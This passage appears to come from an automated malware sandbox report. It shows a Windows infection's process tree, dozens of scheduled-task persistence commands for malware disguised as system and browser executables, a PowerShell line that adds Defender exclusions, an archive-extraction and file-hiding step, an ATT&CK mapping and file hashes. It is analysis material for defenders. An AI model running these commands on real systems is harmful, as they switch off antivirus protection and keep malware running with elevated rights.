        C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\cmd.exe
        
        "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\cmd.exe"
        9⤵
        
        PID:5600
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b0c7836-ef92-4ef4-bfff-6cf1a6e336ab.vbs"
        8⤵
        
        PID:2452
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\APEX_B~1.EXE"
  2⤵
  PID:3560
- - C:\Users\Admin\AppData\Local\Temp\Files\APEX_B~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\APEX_B~1.EXE
    3⤵
    PID:2044
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
  2⤵
  PID:3284
- - C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
    3⤵
    PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\1638027256.exe
      C:\Users\Admin\AppData\Local\Temp\1638027256.exe
      4⤵
      PID:5124
    - - C:\Users\Admin\AppData\Local\Temp\75527495.exe
        
        C:\Users\Admin\AppData\Local\Temp\75527495.exe
        5⤵
        
        PID:4912
    - - C:\Users\Admin\AppData\Local\Temp\69306465.exe
        
        C:\Users\Admin\AppData\Local\Temp\69306465.exe
        5⤵
        
        PID:2980
    - - C:\Users\Admin\AppData\Local\Temp\2222315166.exe
        
        C:\Users\Admin\AppData\Local\Temp\2222315166.exe
        5⤵
        
        PID:5188
    - - C:\Users\Admin\AppData\Local\Temp\96389653.exe
        
        C:\Users\Admin\AppData\Local\Temp\96389653.exe
        5⤵
        
        PID:1636
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\niks.exe"
  2⤵
  PID:3376
- - C:\Users\Admin\AppData\Local\Temp\Files\niks.exe
    C:\Users\Admin\AppData\Local\Temp\Files\niks.exe
    3⤵
    PID:5192
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:5596
- - C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
    C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
    3⤵
    PID:5644
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"
  2⤵
  PID:5740
- - C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
    3⤵
    PID:5820
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
      4⤵
      PID:4012
    - - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        5⤵
        
        PID:4544
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D~1.EXE"
  2⤵
  PID:5980
- - C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D~1.EXE
    3⤵
    PID:5100
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 216
      4⤵
      Program crash
      PID:5064
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe"
  2⤵
  PID:5240
- - C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe
    C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe
    3⤵
    PID:5476
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:4704
- - C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
    C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
    3⤵
    PID:4508
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      PID:3100
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:1520
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p146312891125116171371883110193 -oextracted
        5⤵
        
        PID:4432
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        
        PID:5348
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        
        PID:5392
    - - C:\Windows\system32\attrib.exe
        
        attrib +H "Installer.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4244
    - - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
        
        "Installer.exe"
        5⤵
        
        PID:5312
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
  2⤵
  PID:3176
- - C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
    3⤵
    PID:3676
  - - C:\Users\Admin\AppData\Local\Temp\782831438.exe
      C:\Users\Admin\AppData\Local\Temp\782831438.exe
      4⤵
      PID:5728
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\FILE30~1.EXE"
  2⤵
  PID:3884
- - C:\Users\Admin\AppData\Local\Temp\Files\FILE30~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\FILE30~1.EXE
    3⤵
    PID:2396
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
      4⤵
      PID:324
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
      4⤵
      PID:3560
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PINNAC~1.EXE"
  2⤵
  PID:6044
- - C:\Users\Admin\AppData\Local\Temp\Files\PINNAC~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\PINNAC~1.EXE
    3⤵
    PID:5700
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
  2⤵
  PID:5804
- - C:\Users\Admin\AppData\Local\Temp\Files\1.exe
    C:\Users\Admin\AppData\Local\Temp\Files\1.exe
    3⤵
    PID:6096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows NT\Accessories\es-ES\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\es-ES\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\Accessories\es-ES\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "svchost.coms" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\svchost.com.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "svchost.com" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\svchost.com.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "svchost.coms" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\svchost.com.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gamma_Byte_20240225090825600G" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\Gamma_Byte_20240225090825600.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gamma_Byte_20240225090825600" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\Gamma_Byte_20240225090825600.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gamma_Byte_20240225090825600G" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\Gamma_Byte_20240225090825600.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\Desktop\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Desktop\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\iexplore.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplore" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\iexplore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\iexplore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Templates\chrome.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Users\All Users\Templates\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft\Msblockreview.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Msblockreview" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Start Menu\iexplore.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplore" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\iexplore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Start Menu\iexplore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fuf" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\fu.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fu" /sc ONLOGON /tr "'C:\Program Files\Windows NT\fu.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fuf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\fu.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 8 /tr "'C:\Windows\SysWOW64\sv-SE\chrome.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Windows\SysWOW64\sv-SE\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 9 /tr "'C:\Windows\SysWOW64\sv-SE\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\services.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\L2Schemas\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\Temp\iexplore.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplore" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\iexplore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Google\Temp\iexplore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "QUANTU~1Q" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\QUANTU~1.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "QUANTU~1" /sc ONLOGON /tr "'C:\MSOCache\All Users\QUANTU~1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "QUANTU~1Q" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\QUANTU~1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fuf" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\fu.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fu" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\fu.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fuf" /sc MINUTE /mo 7 /tr "'C:\Program Files\7-Zip\Lang\fu.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\DriverHostCrtNet\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\DriverHostCrtNet\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gamma_Byte_20240225090825600G" /sc MINUTE /mo 6 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\Gamma_Byte_20240225090825600.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gamma_Byte_20240225090825600" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\Gamma_Byte_20240225090825600.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Gamma_Byte_20240225090825600G" /sc MINUTE /mo 11 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\Gamma_Byte_20240225090825600.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E5%88~1%" /sc MINUTE /mo 13 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\%E5%88~1.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E5%88~1" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\%E5%88~1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "%E5%88~1%" /sc MINUTE /mo 13 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\%E5%88~1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Uninstall Information\chrome.exe'" /f
1⤵
- Process spawned unexpected child process
PID:332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\chrome.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:3392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Uninstall Information\chrome.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\firefox.exe'" /f
1⤵
- Creates scheduled task(s)
PID:1020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\firefox.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:4544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\firefox.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:3124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 11 /tr "'C:\Windows\PCHEALTH\iexplore.exe'" /f
1⤵
- Creates scheduled task(s)
PID:4512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplore" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\iexplore.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:3064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "iexplorei" /sc MINUTE /mo 12 /tr "'C:\Windows\PCHEALTH\iexplore.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:4520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Recorded TV\Sample Media\chrome.exe'" /f
1⤵
- Creates scheduled task(s)
PID:4120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Users\Public\Recorded TV\Sample Media\chrome.exe'" /rl HIGHEST /f
1⤵
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Recorded TV\Sample Media\chrome.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:3848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\ALLUSE~1\{90140~1\DW20.EXE

Filesize
757KB

MD5
3ff52cfc29787efdf794372299a6ecab

SHA1
bbaf384661bb3a36523c176a7fce2183319fa5c8

SHA256
0208ab391057c42988284407dccb71e997290debec5f556adfd9c78644541588

SHA512
9e726a88d905b386e7215fef1aa498b1a11a078ce958d53e1594fe43e91c5e69312f9b3589bf86f9718f574128a4cca36ebe4935439ae522e8c6b82854c725da

Download Submit
C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

Filesize
45KB

MD5
a5e2cbbaab058db31d2798b6558c42f1

SHA1
03e558ae2d24aca3c2846e85edee3c5d9b09b7bf

SHA256
4b84e604dd0c9dcce6d7642f4f5ec580a1a56490836a40e07b2a25d5634b2287

SHA512
61cbc1b90021befadfc76f5213c3522cde5db7d0a6ecc5c6afb43c4596bea477821906882a0c1f5432734aa00889453a1dc4691dd1c48b2a4e63b5b7ae08d520

Download Submit
C:\MSOCache\ALLUSE~1\{9A861~1\ose.exe

Filesize
186KB

MD5
58b58875a50a0d8b5e7be7d6ac685164

SHA1
1e0b89c1b2585c76e758e9141b846ed4477b0662

SHA256
2a0aa0763fdef9c38c5dd4d50703f0c7e27f4903c139804ec75e55f8388139ae

SHA512
d67214077162a105d01b11a8e207fab08b45b08fbfba0615a2ea146e1dd99eea35e4f02958a1754d3192292c00caf777f186f0a362e4b8b0da51fabbdb76375b

Download Submit
C:\MSOCache\ALLUSE~1\{9A861~1\setup.exe

Filesize
830KB

MD5
21219b6e5cd1b78c094c13f7b5e3599c

SHA1
e4b7e1f5d5cbf2e5174c9b97f026fc5e52ccb2ee

SHA256
eeefd2cecda39ca7e9fa161d74020b553a56161fb6a89ede6d13e93d035a6a26

SHA512
fb81cd7ca61184b4c38a9ffda43dfe0cacf48114e350d9c8702d03ea75c53959854e473636f80054e1964de61888f10dba721dfa0b6a07b6fe306e4594902063

Download Submit
C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE

Filesize
215KB

MD5
14881ea4d17f04811e598327dcfd2fd5

SHA1
e4a30578eb0a2593c3101cf057f47a406cf84494

SHA256
4d6e7f4a235d44bc7a26bfd47b7d7e9ce4730c1079029b376cbb052486b28a8a

SHA512
57d43d3291bebb1329cd6df0f3569a865c6bc0737854930b1689d187ecaddd8ec61e275bb858297af2ed894689185fb3a2d4ea2142a721fafac5e5b9cbe4c7c9

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE

Filesize
227KB

MD5
e986c1bce9601db11bf98fed6248ce48

SHA1
387c5a756062a0a0cab3a0c8d82c80a4787ba160

SHA256
78c2d40784733ae4d0669a69f97316fe9e21613c8b15a98cae6e6daebbabce47

SHA512
